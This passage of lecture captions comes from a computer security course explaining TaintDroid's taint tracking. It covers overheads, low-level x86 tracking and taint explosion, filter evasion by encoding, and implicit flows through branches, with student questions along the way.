00:41:25,530 --> 00:41:28,460
It basically means three things.

857
00:41:28,460 --> 00:41:33,450
So the first thing you do
is you allocate a new list

858
00:41:33,450 --> 00:41:37,680
node to contain this new
data that you want to add.

859
00:41:37,680 --> 00:41:45,420
Then the second thing you
do is you assign to the data

860
00:41:45,420 --> 00:41:48,050
field of this new node.

861
00:41:48,050 --> 00:41:50,130
And then the third
thing that you do

862
00:41:50,130 --> 00:41:57,140
is you do some type of patch
up of the next pointers

863
00:41:57,140 --> 00:42:02,380
to actually splice the
node into the list.

864
00:42:02,380 --> 00:42:05,710
What's interesting is that
this step here doesn't actually

865
00:42:05,710 --> 00:42:08,960
involve the data field at all.

866
00:42:08,960 --> 00:42:10,840
Just looking at
these next values.

867
00:42:10,840 --> 00:42:14,820
Right, so what's interesting
is that since only these data

868
00:42:14,820 --> 00:42:20,000
objects are tainted, how we
calculate the length of a list.

869
00:42:20,000 --> 00:42:21,701
We basically start
from some head node

870
00:42:21,701 --> 00:42:23,200
and we traverse
these next pointers,

871
00:42:23,200 --> 00:42:25,050
and we count how
many we traverse.

872
00:42:25,050 --> 00:42:27,383
So that algorithm is not going
to touch the tainted data

873
00:42:27,383 --> 00:42:27,920
at all.

874
00:42:27,920 --> 00:42:31,990
So interestingly, even if
you have a linked list that's

875
00:42:31,990 --> 00:42:36,190
filled with tainted
data, then just

876
00:42:36,190 --> 00:42:38,410
calculating the
length of that list

877
00:42:38,410 --> 00:42:41,360
won't actually result in
the generation of value

878
00:42:41,360 --> 00:42:43,630
that is tainted at all.

879
00:42:43,630 --> 00:42:45,200
So does that makes sense?

880
00:42:45,200 --> 00:42:47,772
That may seem a little
bit counterintuitive,

881
00:42:47,772 --> 00:42:49,230
and this is one of
the reasons why,

882
00:42:49,230 --> 00:42:51,521
for example, like when we
were talking about the array,

883
00:42:51,521 --> 00:42:52,080
for example.

884
00:42:52,080 --> 00:42:54,410
They say array.length,
I'm not going

885
00:42:54,410 --> 00:42:56,110
to generate any taint for that.

886
00:42:56,110 --> 00:43:00,390
It's because of
reasons like this.

887
00:43:00,390 --> 00:43:04,950
If you wanted a
stronger assurance

888
00:43:04,950 --> 00:43:06,810
about-- not stronger assurance.

889
00:43:06,810 --> 00:43:08,730
But if you actually
want to calculate

890
00:43:08,730 --> 00:43:14,620
the length of the list to
generate a kind of value,

891
00:43:14,620 --> 00:43:16,650
we could imagine that
your implementation, it's

892
00:43:16,650 --> 00:43:19,857
a bit goofy, but you can
just decide to touch data

893
00:43:19,857 --> 00:43:21,940
for no real semantic reason
other than to generate

894
00:43:21,940 --> 00:43:24,156
taint in the resulting length.

895
00:43:24,156 --> 00:43:26,280
Or, as I'll discuss towards
the end of the lecture,

896
00:43:26,280 --> 00:43:27,780
you could actually
use a language

897
00:43:27,780 --> 00:43:31,740
which allows you the
programmer to define

898
00:43:31,740 --> 00:43:33,780
your own types of taint.

899
00:43:33,780 --> 00:43:36,530
And then you can actually
define your own policies

900
00:43:36,530 --> 00:43:38,280
for things like this.

901
00:43:38,280 --> 00:43:41,146
One nice thing about TaintDroid
is that you as a developer,

902
00:43:41,146 --> 00:43:42,520
you don't have to
label anything.

903
00:43:42,520 --> 00:43:44,144
TaintDroid basically
does that for you.

904
00:43:44,144 --> 00:43:46,767
It says here's all the sensitive
stuff that can be a source,

905
00:43:46,767 --> 00:43:48,850
here's all the sensitive
stuff that can be a sink.

906
00:43:48,850 --> 00:43:51,104
You as a developer,
you're ready to go.

907
00:43:51,104 --> 00:43:53,020
But if you want that
pointer to be controlled,

908
00:43:53,020 --> 00:43:56,700
you might have to build some
of the policies yourself.

909
00:43:56,700 --> 00:44:04,364
All right, so in terms
of performance overhead

910
00:44:04,364 --> 00:44:06,030
of TaintDroid, what
does that look like?

911
00:44:08,550 --> 00:44:11,710
The overheads actually seem
to be pretty reasonable.

912
00:44:11,710 --> 00:44:16,006
So there's going to be
memory overhead, and that's

913
00:44:16,006 --> 00:44:18,070
the memory overhead,
essentially,

914
00:44:18,070 --> 00:44:21,730
of storing all of
these taint tags.

915
00:44:21,730 --> 00:44:27,320
And so there's going
to be CPU overhead,

916
00:44:27,320 --> 00:44:32,290
and this is basically to
assign, propagate, and check

917
00:44:32,290 --> 00:44:34,720
those taint calculations.

918
00:44:34,720 --> 00:44:36,600
And that's because of
overhead like here.

919
00:44:36,600 --> 00:44:38,640
So any interpreting
for the Dalvik VM,

920
00:44:38,640 --> 00:44:40,470
we're actually doing
additional work.

921
00:44:40,470 --> 00:44:44,080
So looking at the source,
looking at this 32 bit taint

922
00:44:44,080 --> 00:44:47,209
information, we're
doing the or operations

923
00:44:47,209 --> 00:44:49,250
that we discussed before,
and so on and so forth.

924
00:44:49,250 --> 00:44:52,260
So that's
computational overhead.

925
00:44:52,260 --> 00:44:54,610
These overheads actually
seem to be pretty moderate.

926
00:44:54,610 --> 00:45:01,540
So for memory, the authors
report about 3% to 5%

927
00:45:01,540 --> 00:45:03,910
in terms of the
extra RAM space you

928
00:45:03,910 --> 00:45:06,015
need to store those taint tags.

929
00:45:06,015 --> 00:45:07,550
So that's not too bad.

930
00:45:07,550 --> 00:45:11,460
The CPU overhead is higher,
which I think makes sense.

931
00:45:11,460 --> 00:45:18,610
They're both somewhere between,
let's say, 3% and about 29% CPU

932
00:45:18,610 --> 00:45:19,661
overhead.

933
00:45:19,661 --> 00:45:22,160
And the reason why I think it's
reasonable to see why that's

934
00:45:22,160 --> 00:45:27,080
higher is because you can
imagine that every time you

935
00:45:27,080 --> 00:45:28,850
step into the
interpreter loop, you're

936
00:45:28,850 --> 00:45:31,440
having to look at these
tags and do some operations.

937
00:45:31,440 --> 00:45:34,850
So even though it is all
these bitwise operations,

938
00:45:34,850 --> 00:45:36,690
you have to do
that all the time.

939
00:45:36,690 --> 00:45:39,960
So that seems like it's going to
get painful, whereas basically,

940
00:45:39,960 --> 00:45:43,630
the overhead for this, OK, so
you put a couple extra integers

941
00:45:43,630 --> 00:45:44,740
in memory somewhere.

942
00:45:44,740 --> 00:45:48,340
That doesn't seem,
maybe, too bad.

943
00:45:48,340 --> 00:45:53,570
Even on it's high end, 29%,
in of itself maybe that's OK,

944
00:45:53,570 --> 00:45:56,664
because Silicon Valley
keeps telling us

945
00:45:56,664 --> 00:45:59,080
that we need phones that have
like quad cores and whatnot,

946
00:45:59,080 --> 00:46:01,329
so probably have a lot of
spare cycles sitting around.

947
00:46:01,329 --> 00:46:03,550
So maybe that's not
all that crushing.

948
00:46:03,550 --> 00:46:06,750
Although there might be a
problem with battery life.

949
00:46:06,750 --> 00:46:08,567
So even if you have
these extra cores,

950
00:46:08,567 --> 00:46:10,900
you might not want your phone
getting hot in your pocket

951
00:46:10,900 --> 00:46:12,950
as you're just sitting
there, just sort

952
00:46:12,950 --> 00:46:15,100
of churning and calculating
some of this stuff.

953
00:46:15,100 --> 00:46:17,400
I think for here,
the main issue here

954
00:46:17,400 --> 00:46:19,400
would be if this is
bad for your battery.

955
00:46:19,400 --> 00:46:21,235
If it's not bad
for your battery,

956
00:46:21,235 --> 00:46:23,985
then probably even at that high
end, that may not be that bad.

957
00:46:28,800 --> 00:46:30,860
So that is essentially
an overview

958
00:46:30,860 --> 00:46:32,785
of how TaintDroid works.

959
00:46:32,785 --> 00:46:34,564
Any more questions before we--

960
00:46:34,564 --> 00:46:37,516
AUDIENCE: Do you tag
something that also

961
00:46:37,516 --> 00:46:39,484
has been there all the time?

962
00:46:39,484 --> 00:46:41,698
Do you tag every
variable, or only

963
00:46:41,698 --> 00:46:43,420
tag the ones that have this?

964
00:46:43,420 --> 00:46:46,840
PROFESSOR: Yes, so you
basically tag everything.

965
00:46:46,840 --> 00:46:52,518
So in theory, there's
nothing that prevents you

966
00:46:52,518 --> 00:46:56,917
from not allocating any taint
information for stuff that

967
00:46:56,917 --> 00:46:57,750
has no taint at all.

968
00:46:57,750 --> 00:47:00,170
I think the problem,
then, with it--

969
00:47:00,170 --> 00:47:04,545
then once something gains
even one bit of taint,

970
00:47:04,545 --> 00:47:07,770
then you have to do dynamic
sort of layout changes.

971
00:47:07,770 --> 00:47:11,670
So what if on the stack,
this local here, then it

972
00:47:11,670 --> 00:47:13,670
had a taint, so now you're
allocating with this,

973
00:47:13,670 --> 00:47:14,303
and it does get taint.

974
00:47:14,303 --> 00:47:16,520
Or you have that extra
taint flag live on the heap,

975
00:47:16,520 --> 00:47:18,020
and you're going to see
how it rewrites the stack,

976
00:47:18,020 --> 00:47:20,140
and then someone made
your code-- so we're

977
00:47:20,140 --> 00:47:21,306
going to see how that works.

978
00:47:21,306 --> 00:47:25,210
So in practice, typical use
is like shadow memory somehow,

979
00:47:25,210 --> 00:47:29,800
so every byte in the
application is backed up

980
00:47:29,800 --> 00:47:32,060
by some byte of extra
information somewhere.

981
00:47:32,060 --> 00:47:35,060
And in the case of TaintDroid,
that shadowing actually

982
00:47:35,060 --> 00:47:37,060
lives alongside of the
actual variable itself.

983
00:47:37,060 --> 00:47:40,060
Anyone has another question?

984
00:47:40,060 --> 00:47:41,860
OK.

985
00:47:41,860 --> 00:47:43,302
Cool.

986
00:47:43,302 --> 00:47:46,720
This system essentially
tracks information

987
00:47:46,720 --> 00:47:53,840
at the level of these high
level Dalvik VM instructions.

988
00:47:53,840 --> 00:47:59,310
So one thing you might
think to yourself

989
00:47:59,310 --> 00:48:11,230
is, could we track taint at
the level of x86 instructions

990
00:48:11,230 --> 00:48:14,087
or the ARM instructions.

991
00:48:17,797 --> 00:48:19,255
One reason why that
might be useful

992
00:48:19,255 --> 00:48:22,470
is because then
we could actually

993
00:48:22,470 --> 00:48:26,650
understand how information flows
through arbitrary applications,

994
00:48:26,650 --> 00:48:30,160
not just ones that are running
inside this tricked out

995
00:48:30,160 --> 00:48:33,270
VM that requires you to run
Java and so on and so forth.

996
00:48:33,270 --> 00:48:37,367
So why not track
taint at that level.

997
00:48:37,367 --> 00:48:39,200
It turns out that you
can, in fact, do that.

998
00:48:39,200 --> 00:48:42,100
So there are projects that we
looked at at tracking taint

999
00:48:42,100 --> 00:48:43,960
at this low level.

1000
00:48:43,960 --> 00:48:46,768
What's nice is that you maybe
get that increased coverage.

1001
00:48:46,768 --> 00:48:48,724
You don't throw a
line into [INAUDIBLE]

1002
00:48:48,724 --> 00:48:51,560
for how, for example, Java
code interacts with native code

1003
00:48:51,560 --> 00:48:52,060
methods.

1004
00:48:52,060 --> 00:48:54,015
It's all eventually
going to result down

1005
00:48:54,015 --> 00:48:56,324
to x86 instructions
executed, so that

1006
00:48:56,324 --> 00:48:58,740
removed a lot of the manual
effort that you as a developer

1007
00:48:58,740 --> 00:49:01,819
have to do to sort of understand
it's the taint semantics if you

1008
00:49:01,819 --> 00:49:02,610
use native methods.

1009
00:49:02,610 --> 00:49:07,210
But the problem with that, if
we track at this low level,

1010
00:49:07,210 --> 00:49:11,540
it can be very
expensive to do this.

1011
00:49:11,540 --> 00:49:17,460
You can also get a lot
of false positives.

1012
00:49:17,460 --> 00:49:20,160
So if they're spec'd
to the expense,

1013
00:49:20,160 --> 00:49:24,217
there's also this
issue of correctness.

1014
00:49:26,750 --> 00:49:31,050
As you may know, x86 is
an adversarially complex

1015
00:49:31,050 --> 00:49:32,690
instruction set.

1016
00:49:32,690 --> 00:49:34,830
There's all kinds of crazy
things that it can do.

1017
00:49:34,830 --> 00:49:38,540
I don't know if you've ever
seen an x86 instruction manual,

1018
00:49:38,540 --> 00:49:39,810
they're huge.

1019
00:49:39,810 --> 00:49:42,730
So they'll have one huge
manual that's this thick,

1020
00:49:42,730 --> 00:49:45,710
and then it'll say this is
instructions whose letters

1021
00:49:45,710 --> 00:49:48,435
start with M through P, and
there'll be this full on series

1022
00:49:48,435 --> 00:49:50,172
about that.

1023
00:49:50,172 --> 00:49:52,270
So it's actually
pretty tricky to think

1024
00:49:52,270 --> 00:49:54,295
about what it means to
actually track taint

1025
00:49:54,295 --> 00:49:57,130
at the level of x86 instruction.

1026
00:49:57,130 --> 00:49:59,605
Because even seemingly
simple instructions,

1027
00:49:59,605 --> 00:50:02,080
like sometimes at,
they're setting

1028
00:50:02,080 --> 00:50:04,060
all types of internal
processor registers

1029
00:50:04,060 --> 00:50:05,840
and flags and things like that.

1030
00:50:05,840 --> 00:50:08,400
So it's very difficult to
describe in the first place.

1031
00:50:08,400 --> 00:50:12,220
If you could do that, it's
also oftentimes very expensive.

1032
00:50:12,220 --> 00:50:16,547
You're sort of looking at things
at a very, very low level.

1033
00:50:16,547 --> 00:50:18,310
So the amount of state
you have to track

1034
00:50:18,310 --> 00:50:19,914
might get very
large very quickly.

1035
00:50:19,914 --> 00:50:22,710
It might be a very sensitive
computational clause.

1036
00:50:22,710 --> 00:50:25,090
Then there's this issue
of false positives.

1037
00:50:25,090 --> 00:50:29,180
This is actually
pretty devastating.

1038
00:50:29,180 --> 00:50:34,576
You can get into bad
problems if you ever

1039
00:50:34,576 --> 00:50:42,729
have kernel data that
improperly gets tainted.

1040
00:50:47,719 --> 00:50:52,960
And if this happens, maybe
because your infrastructure's

1041
00:50:52,960 --> 00:50:56,034
trying to be ultraconservative,
it doesn't want

1042
00:50:56,034 --> 00:50:57,450
to miss anything,
so it says well,

1043
00:50:57,450 --> 00:50:59,480
I'm going to err on
the side of security.

1044
00:50:59,480 --> 00:51:02,740
And I'm going to taint some
of this kernel data structure,

1045
00:51:02,740 --> 00:51:07,470
then what you get here is
this exciting term they

1046
00:51:07,470 --> 00:51:09,190
call taint explosion.

1047
00:51:09,190 --> 00:51:11,730
What this basically means
is that at a certain point,

1048
00:51:11,730 --> 00:51:13,780
there are certain things that
if they end up getting tainted,

1049
00:51:13,780 --> 00:51:15,446
they're involved in
so many calculations

1050
00:51:15,446 --> 00:51:18,342
that essentially everything
in your program gets polluted.

1051
00:51:18,342 --> 00:51:20,550
It's like one of these things
in Dungeons and Dragons

1052
00:51:20,550 --> 00:51:22,900
where you touch this
evil thing and eventually

1053
00:51:22,900 --> 00:51:26,395
death spreads
throughout your body.

1054
00:51:26,395 --> 00:51:29,624
This is very bad, because
if you can't tightly

1055
00:51:29,624 --> 00:51:32,140
constrain the way that taint
flows through the system,

1056
00:51:32,140 --> 00:51:34,510
then eventually what's
going to end up happening

1057
00:51:34,510 --> 00:51:34,984
is that you let this
run for a while,

1058
00:51:34,984 --> 00:51:36,984
the system's going to say
you can't do anything.

1059
00:51:36,984 --> 00:51:38,964
You can't send anything
over the network,

1060
00:51:38,964 --> 00:51:40,672
you can't display
anything on the screen,

1061
00:51:40,672 --> 00:51:42,270
because everything
in your system

1062
00:51:42,270 --> 00:51:44,700
seems like it's been tainted
by some sensitive error,

1063
00:51:44,700 --> 00:51:47,350
even if that's not the case.

1064
00:51:47,350 --> 00:51:53,980
One way that this can
happen is if somehow

1065
00:51:53,980 --> 00:51:59,700
the stack pointer or the
break pointer get tainted.

1066
00:52:03,780 --> 00:52:06,819
If this happens, you're
probably in a world of hurt.

1067
00:52:06,819 --> 00:52:09,540
You can imagine that all
of the instructions in x86,

1068
00:52:09,540 --> 00:52:15,100
for example, that access the
stack, they all go through ESB.

1069
00:52:15,100 --> 00:52:19,130
So the stack register gets
corrupted somehow, that's bad.

1070
00:52:19,130 --> 00:52:20,910
If the break point
register gets bad,

1071
00:52:20,910 --> 00:52:24,065
a lot of times when you want
your equivalents to access

1072
00:52:24,065 --> 00:52:28,238
local variables, it has
to go the EBP indirectly.

1073
00:52:28,238 --> 00:52:31,070
So if anybody ever touches
those in terms of taint,

1074
00:52:31,070 --> 00:52:32,355
it's basically game over.

1075
00:52:32,355 --> 00:52:33,980
So there's a link in
the lecture that's

1076
00:52:33,980 --> 00:52:36,063
about a paper that
acknowledges some of this stuff

1077
00:52:36,063 --> 00:52:39,540
and basically says that we have
to be very careful when we do

1078
00:52:39,540 --> 00:52:42,274
taint tracking at this low level
because very quickly, if you're

1079
00:52:42,274 --> 00:52:44,190
looking at how this works
in the Linux kernel,

1080
00:52:44,190 --> 00:52:46,564
there are certain optimizations
the Linux kernel would do

1081
00:52:46,564 --> 00:52:49,054
to make its code fast, but
will result, unintentionally,

1082
00:52:49,054 --> 00:52:51,960
in the break pointer or the
stack pointer getting tainted.

1083
00:52:51,960 --> 00:52:54,407
And once that happens, you
can't really do anything useful

1084
00:52:54,407 --> 00:52:55,698
with the taint tracking system.

1085
00:52:55,698 --> 00:53:01,316
AUDIENCE: So how do you do
this [INAUDIBLE] programs?

1086
00:53:01,316 --> 00:53:04,120
It seems like you have all
these register files in the CPU.

1087
00:53:04,120 --> 00:53:06,210
PROFESSOR: Yeah, so great.

1088
00:53:06,210 --> 00:53:08,261
So all those register
files, it hangs back

1089
00:53:08,261 --> 00:53:09,260
to the correctness case.

1090
00:53:09,260 --> 00:53:11,362
So unless you are
very, very good

1091
00:53:11,362 --> 00:53:12,790
at understanding
x86 architecture,

1092
00:53:12,790 --> 00:53:14,694
there are going to be
things that you miss.

1093
00:53:14,694 --> 00:53:17,550
It terms of computation
level, how do you actually

1094
00:53:17,550 --> 00:53:18,260
do this thing.

1095
00:53:18,260 --> 00:53:22,307
There's this-- I think
the most popular way,

1096
00:53:22,307 --> 00:53:23,640
and I could be wrong about this.

1097
00:53:23,640 --> 00:53:25,406
So when I say it's
popular, the way I

1098
00:53:25,406 --> 00:53:28,010
know about, because I'm a
knowledge [INAUDIBLE], right.

1099
00:53:28,010 --> 00:53:31,050
There's this system
submitter called Bochs,

1100
00:53:31,050 --> 00:53:35,552
I think it's spelled like this.

1101
00:53:35,552 --> 00:53:37,010
They actually have
something called

1102
00:53:37,010 --> 00:53:43,600
TaintBochs, which actually does
x86 level innuation of flow.

1103
00:53:43,600 --> 00:53:45,390
And it's actually
an interpreter,

1104
00:53:45,390 --> 00:53:47,840
you can think of it as.

1105
00:53:47,840 --> 00:53:50,166
So it's going to take
your entire OS and all

1106
00:53:50,166 --> 00:53:51,970
your applications,
and it's going

1107
00:53:51,970 --> 00:53:55,450
to look at each x86
instruction and try to simulate

1108
00:53:55,450 --> 00:53:57,230
what the hardware would do.

1109
00:53:57,230 --> 00:53:59,090
So you can imagine this
is very, very slow.

1110
00:53:59,090 --> 00:54:00,940
What's nice about that is you
don't require any hardware

1111
00:54:00,940 --> 00:54:03,290
support, and then it's
relatively straightforward

1112
00:54:03,290 --> 00:54:06,794
to tweak your software
model of how things work,

1113
00:54:06,794 --> 00:54:08,210
if you discovered
that you weren't

1114
00:54:08,210 --> 00:54:10,460
tracking some registered
files or something like that.

1115
00:54:10,460 --> 00:54:14,114
AUDIENCE: So the ideal solution
would be architectural support.

1116
00:54:14,114 --> 00:54:15,715
PROFESSOR: Yeah,
so there have been

1117
00:54:15,715 --> 00:54:17,240
techniques to do that, too.

1118
00:54:17,240 --> 00:54:22,179
That gets a little bit
subtle because, for example,

1119
00:54:22,179 --> 00:54:23,720
if you look here
you've looked at how

1120
00:54:23,720 --> 00:54:27,488
we've allocated the taint
state next to the variables

1121
00:54:27,488 --> 00:54:28,840
themselves.

1122
00:54:28,840 --> 00:54:31,610
So if you bake in that
support in the hardware,

1123
00:54:31,610 --> 00:54:34,565
it can be very difficult to,
for example, change the way

1124
00:54:34,565 --> 00:54:35,920
you want the layout to work.

1125
00:54:35,920 --> 00:54:37,836
Because then it's like
baked into the silicon.

1126
00:54:37,836 --> 00:54:42,258
You could imagine doing some of
this because at a high level--

1127
00:54:42,258 --> 00:54:43,580
where do we have it.

1128
00:54:43,580 --> 00:54:47,716
So the Dalvik VM and TaintDroid
is executing these high level

1129
00:54:47,716 --> 00:54:49,960
instructions and it's
assigning taint at this level.

1130
00:54:49,960 --> 00:54:52,340
You can imagine doing that
at the hardware level, too.

1131
00:54:52,340 --> 00:54:53,840
So actually, if
this is the silicon,

1132
00:54:53,840 --> 00:54:55,340
you can probably make that work.

1133
00:54:55,340 --> 00:54:56,840
So that's definitely possible.

1134
00:54:56,840 --> 00:54:58,340
You had a question?

1135
00:54:58,340 --> 00:55:00,840
AUDIENCE: What
does TaintDroid do

1136
00:55:00,840 --> 00:55:03,840
with information built from
branching and permission tests.

1137
00:55:03,840 --> 00:55:06,090
PROFESSOR: Oh, we're going
to get to that in a second.

1138
00:55:06,090 --> 00:55:08,339
So just hold that thought,
we're going to get to that.

1139
00:55:08,339 --> 00:55:10,588
AUDIENCE: I'm curious,
how long was it

1140
00:55:10,588 --> 00:55:13,796
to things like buffer overflow
because all the things are so

1141
00:55:13,796 --> 00:55:14,962
nested together [INAUDIBLE]?

1142
00:55:18,850 --> 00:55:20,340
PROFESSOR: That's
a good question.

1143
00:55:20,340 --> 00:55:24,530
So presumably, one would hope
that in a language like Java

1144
00:55:24,530 --> 00:55:26,950
there are no buffer
overflow, right.

1145
00:55:26,950 --> 00:55:29,436
But you can imagine
in a language like C,

1146
00:55:29,436 --> 00:55:31,700
for example, where you
didn't have this protection,

1147
00:55:31,700 --> 00:55:33,950
maybe there's something
catastrophic that could happen

1148
00:55:33,950 --> 00:55:35,964
or somehow, if you
did a buffer overflow

1149
00:55:35,964 --> 00:55:37,880
and then you were able
to overwrite taint tags

1150
00:55:37,880 --> 00:55:41,239
and you could set this to
zeros, then you could just

1151
00:55:41,239 --> 00:55:42,280
let your data exfiltrate.

1152
00:55:42,280 --> 00:55:45,196
AUDIENCE: I think if
it's super predictable,

1153
00:55:45,196 --> 00:55:47,626
like one every other one
for the next q variables,

1154
00:55:47,626 --> 00:55:49,084
there's no stacking--

1155
00:55:49,084 --> 00:55:51,546
PROFESSOR: I was going to
say, that's exactly right.

1156
00:55:51,546 --> 00:55:52,550
So you run into
somewhat similar issues

1157
00:55:52,550 --> 00:55:54,720
like what we can discuss
with the stack canaries,

1158
00:55:54,720 --> 00:55:57,520
because basically we have
this data on the stack,

1159
00:55:57,520 --> 00:56:00,370
like in this particular
layout, that you don't neither

1160
00:56:00,370 --> 00:56:02,720
want to make it
impossible to overwrite,

1161
00:56:02,720 --> 00:56:05,400
or if it is overwritten, one
that's hacked in some way.

1162
00:56:05,400 --> 00:56:07,264
So you're exactly
right about that.

1163
00:56:12,120 --> 00:56:16,069
So you can in fact do taint
tracking at this low level

1164
00:56:16,069 --> 00:56:18,360
although it may be expensive
and a little bit difficult

1165
00:56:18,360 --> 00:56:19,700
to get right.

1166
00:56:19,700 --> 00:56:21,980
So you might say well,
why don't we just punt

1167
00:56:21,980 --> 00:56:24,313
on this whole issue of taint
tracking in the first place

1168
00:56:24,313 --> 00:56:26,870
and instead we're just
going to look at the things

1169
00:56:26,870 --> 00:56:29,450
that the program tries to output
over the network, let's say,

1170
00:56:29,450 --> 00:56:32,290
and just do a scan for
data that seems sensitive.

1171
00:56:32,290 --> 00:56:34,150
That seems to be much
more lightweight,

1172
00:56:34,150 --> 00:56:37,240
you don't have to do this
dynamic instrumentation of all

1173
00:56:37,240 --> 00:56:39,240
the things the program's doing.

1174
00:56:39,240 --> 00:56:41,600
The problem with that,
though, is that that will only

1175
00:56:41,600 --> 00:56:43,210
work as a heuristic.

1176
00:56:43,210 --> 00:56:46,100
In fact, if the attacker knows
that this is what you're doing,

1177
00:56:46,100 --> 00:56:47,871
then it's pretty
easy to subvert that.

1178
00:56:47,871 --> 00:56:49,620
So if you're just
sitting there and you're

1179
00:56:49,620 --> 00:56:53,940
trying to do a grep for numbers,
Social Security numbers,

1180
00:56:53,940 --> 00:56:57,030
then the attacker can
just use base 64 encoding,

1181
00:56:57,030 --> 00:56:59,190
or do some other wacky
thing, compress it.

1182
00:56:59,190 --> 00:57:01,630
It's actually trivial to get
past that type of filter.

1183
00:57:01,630 --> 00:57:03,360
So in practice,
that's completely

1184
00:57:03,360 --> 00:57:06,060
insufficient from the
security perspective.

1185
00:57:06,060 --> 00:57:07,650
Now let's get back
to the question

1186
00:57:07,650 --> 00:57:11,650
that you brought up,
which was basically

1187
00:57:11,650 --> 00:57:16,380
how can we track flows
through things like branches,

1188
00:57:16,380 --> 00:57:17,290
for example.

1189
00:57:17,290 --> 00:57:20,312
So this is basically
going to lead us

1190
00:57:20,312 --> 00:57:27,450
to a topic that's
called implicit flows.

1191
00:57:27,450 --> 00:57:29,900
And so an implicit
flow occurs typically

1192
00:57:29,900 --> 00:57:32,540
when you have a
tainted value that's

1193
00:57:32,540 --> 00:57:38,560
going to affect the way that
another variable is assigned,

1194
00:57:38,560 --> 00:57:42,730
even though that implicit
flow variable doesn't directly

1195
00:57:42,730 --> 00:57:43,530
assign variables.

1196
00:57:43,530 --> 00:57:46,470
This will make more sense
with a concrete example.

1197
00:57:46,470 --> 00:57:51,980
Let's say that you have an if
statement that does something

1198
00:57:51,980 --> 00:57:54,130
like, it's going to
look at your INEI

1199
00:57:54,130 --> 00:57:58,110
and it's going to say
if it's greater than 42,

1200
00:57:58,110 --> 00:58:03,340
maybe I'm going
to assign 0 to x.

1201
00:58:03,340 --> 00:58:08,350
Otherwise I'm going to assign 1.

1202
00:58:08,350 --> 00:58:11,430
So what's interesting
here is that we're

1203
00:58:11,430 --> 00:58:14,240
looking at this
sensitive data here

1204
00:58:14,240 --> 00:58:16,960
and we're doing some
comparison of it up here,

1205
00:58:16,960 --> 00:58:19,610
but when we're assigning
to x down here,

1206
00:58:19,610 --> 00:58:21,470
we're not actually
assigning something

1207
00:58:21,470 --> 00:58:26,940
that is directly derived
from the sensitive data here.

1208
00:58:26,940 --> 00:58:29,200
This is an example of one
of these implicit flows.

1209
00:58:29,200 --> 00:58:31,070
Because the value
of x is actually

1210
00:58:31,070 --> 00:58:34,880
dependent on this thing
here, but the adversary,

1211
00:58:34,880 --> 00:58:37,380
if they're clever, can sort of
structure their code in a way

1212
00:58:37,380 --> 00:58:39,340
that there's no
direct assignment.

1213
00:58:39,340 --> 00:58:42,427
Now note that even here,
instead of just assigning to x,

1214
00:58:42,427 --> 00:58:44,260
you can just say let's
try to send something

1215
00:58:44,260 --> 00:58:45,190
over the network.

1216
00:58:45,190 --> 00:58:48,440
You might say over
the network x is 0,

1217
00:58:48,440 --> 00:58:50,250
or x is 1, or
something like that.

1218
00:58:50,250 --> 00:58:53,860
So that's an example of one
of these implicit flows that

1219
00:58:53,860 --> 00:58:57,050
a system like TaintDroid
cannot actually handle.

1220
00:58:57,050 --> 00:59:00,990
So do people sort of see the
problem here at a high level?

1221
00:59:00,990 --> 00:59:01,490
Yes.

1222
00:59:01,490 --> 00:59:03,890
This is called an
explicit flow as contrast

1223
00:59:03,890 --> 00:59:08,042
to those direct flows like
from the assignment operator.

1224
00:59:08,042 --> 00:59:15,838
AUDIENCE: What if [INAUDIBLE]
a native power function that

1225
00:59:15,838 --> 00:59:17,335
did exactly [INAUDIBLE]?

1226
00:59:20,735 --> 00:59:23,355
Because the output in
that case would be, right?

1227
00:59:23,355 --> 00:59:24,480
PROFESSOR: Well, let's see.

1228
00:59:24,480 --> 00:59:26,074
So it depends.

1229
00:59:26,074 --> 00:59:28,002
So if I understand your
question correctly,

1230
00:59:28,002 --> 00:59:29,930
you're saying there could
be some native function that

1231
00:59:29,930 --> 00:59:31,440
does something that's sort
of equivalent to this,

1232
00:59:31,440 --> 00:59:34,016
and so for example, TaintDroid
wouldn't know necessarily,

1233
00:59:34,016 --> 00:59:35,890
because it can't look
inside this native code

1234
00:59:35,890 --> 00:59:38,627
to see this type of thing.

1235
00:59:38,627 --> 00:59:40,925
The way that the authors
claim that they would handle

1236
00:59:40,925 --> 00:59:44,775
that is that they would say for
native methods that are defined

1237
00:59:44,775 --> 00:59:47,380
by the VM itself, they
would look at the contract

1238
00:59:47,380 --> 00:59:49,140
that method exposes
and they might

1239
00:59:49,140 --> 00:59:51,540
say things like I take
these two integers

1240
00:59:51,540 --> 00:59:52,980
and then return the average.

1241
00:59:52,980 --> 00:59:54,960
So then the TaintDroid
system would

1242
00:59:54,960 --> 00:59:57,224
say we trust that the native
function does that, so we

1243
00:59:57,224 --> 00:59:59,224
need to figure out what
the appropriate tainting

1244
00:59:59,224 --> 01:00:00,380
policy should be.

1245
01:00:00,380 --> 01:00:03,165
However, you are correct
that if something like this

1246
01:00:03,165 --> 01:00:05,880
was sort of hidden inside and
for whatever reason wasn't

1247
01:00:05,880 --> 01:00:07,850
exposed to the
public-facing contract,

1248
01:00:07,850 --> 01:00:13,310
then the manual policy that the
TaintDroid authors came up with

1249
01:00:13,310 --> 01:00:15,220
might not catch
this implicit flow.

1250
01:00:15,220 --> 01:00:16,700
It might actually
allow information

1251
01:00:16,700 --> 01:00:17,534
to leak out somehow.

1252
01:00:17,534 --> 01:00:19,367
But I mean for that
matter, there might even

1253
01:00:19,367 --> 01:00:23,514
be a direct flow in there that
the TaintDroid authors couldn't

1254
01:00:23,514 --> 01:00:26,958
see and you might still have
an even more direct leak.

1255
01:00:26,958 --> 01:00:30,402
AUDIENCE: So in practice, this
seems very dangerous, right?

1256
01:00:30,402 --> 01:00:32,862
Because you can literally send
the whole [INAUDIBLE] value

1257
01:00:32,862 --> 01:00:37,782
by just looking at
this last three--

1258
01:00:37,782 --> 01:00:38,870
PROFESSOR: That's right.

1259
01:00:38,870 --> 01:00:40,780
We had class a few times where
you'd sit in a while loop

1260
01:00:40,780 --> 01:00:42,990
and you'd try to construct
these implicit flows to do

1261
01:00:42,990 --> 01:00:44,050
these types of things.

1262
01:00:44,050 --> 01:00:45,950
There's actually
some ways that you

1263
01:00:45,950 --> 01:00:49,390
can think about trying to
fix some of this stuff.

1264
01:00:49,390 --> 01:00:52,142
At a high level,
one approach you

1265
01:00:52,142 --> 01:00:53,618
can do to try to
prevent this stuff

1266
01:00:53,618 --> 01:01:03,600
is you can actually assign
a taint tag to the PC.

1267
01:01:07,390 --> 01:01:18,690
Then essentially you taint
it with the branch test.

1268
01:01:18,690 --> 01:01:23,130
So the idea here is that we as
humans can look at this code

